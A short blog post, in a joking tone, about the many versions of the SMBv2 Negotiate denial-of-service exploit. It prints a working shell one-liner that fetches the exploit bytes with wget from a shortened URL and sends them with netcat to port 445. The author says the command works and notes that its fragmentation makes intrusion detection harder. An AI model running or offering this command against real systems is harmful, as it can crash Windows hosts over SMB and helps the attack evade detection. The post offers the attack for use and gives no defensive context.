The most implemented exploit ever: SMBv2 Negotiate DoS

Swinging by SecurityFocus' exploit list for the recent SMBv2 denial of service, I was immediately struck by the apparent silliness of listing five seperate but nearly identical implementations of the same bug. So struck, I daresay, that I could not resist writing my own stand-alone Ruby version, joking that maybe SecurityFocus will pick it up and make me famous.

Well, they did, and I did lol.

They also picked up I)ruid's much more interesting bash shell version. I thought that opening a socket straight on the command line was strictly the purview of Plan 9, but he proved me wrong.

The most "meta" version, so far, is Brent's wget-to-netcat implementation; I couldn't get it to function exactly as his tweet was written, but here's a version that Works For Me:

for i in `wget http://ur1.ca/bhe8 -q -O-|egrep 'oit.*".*"'|sed 's/s.*[<|=]//g'|sed 's/#.*//g'|sed 's/ "\(.*\)"/\1/'`;do echo -e -n $i;done|nc -w 1 127.0.0.1 445 > /dev/null

This has the added bonus of including some mild fragmentation, making IDS detection a little more squirrelly.

At any rate, I think this is all quite hilarious, and now I'm hopeful that the SMBv2 bug will be the widest-implemented DoS ever.

Update: |)ruid has published a version in Expect

Update: I've published a version in Perl

Update: Someone published a version in Java